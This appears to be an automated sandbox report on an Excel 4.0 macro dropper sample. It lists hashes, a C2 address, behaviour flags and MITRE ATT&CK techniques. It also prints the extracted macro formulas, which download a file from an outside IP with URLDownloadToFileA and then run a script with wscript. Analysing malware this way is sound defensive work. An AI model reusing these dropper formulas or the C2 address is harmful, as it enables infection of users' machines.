General

  • Target

    f7e99cc1710ebefc340098c8d5d01d09_JaffaCakes118

  • Size

    6KB

  • Sample

    240418-nsqa4sbg36

  • MD5

    f7e99cc1710ebefc340098c8d5d01d09

  • SHA1

    796ba003315a271f20e77076212fe0b0d7f30853

  • SHA256

    f9c30383c481ca29a36b47d1fe4a935392544cc10136ba64d8b0c9b36992d915

  • SHA512

    5ca0207a30b8548830f8a7782416a23bbb382521d21931aba3e4dbef28b9b29fc94a04151368defd647e4b8b447474cb099a582222e12862f372220135c98b6f

  • SSDEEP

    192:NDSeuScbrA2OmmfRv8UhHFBFYuBb98yTK+Z:NJupM2w11FY8b98yTp

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

xlm40.dropper

http://google.com/index.php

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

Targets

    • Target

      f7e99cc1710ebefc340098c8d5d01d09_JaffaCakes118

    • Size

      6KB

    • MD5

      f7e99cc1710ebefc340098c8d5d01d09

    • SHA1

      796ba003315a271f20e77076212fe0b0d7f30853

    • SHA256

      f9c30383c481ca29a36b47d1fe4a935392544cc10136ba64d8b0c9b36992d915

    • SHA512

      5ca0207a30b8548830f8a7782416a23bbb382521d21931aba3e4dbef28b9b29fc94a04151368defd647e4b8b447474cb099a582222e12862f372220135c98b6f

    • SSDEEP

      192:NDSeuScbrA2OmmfRv8UhHFBFYuBb98yTK+Z:NJupM2w11FY8b98yTp

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

MITRE ATT&CK Matrix ATT&CK v13

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Tasks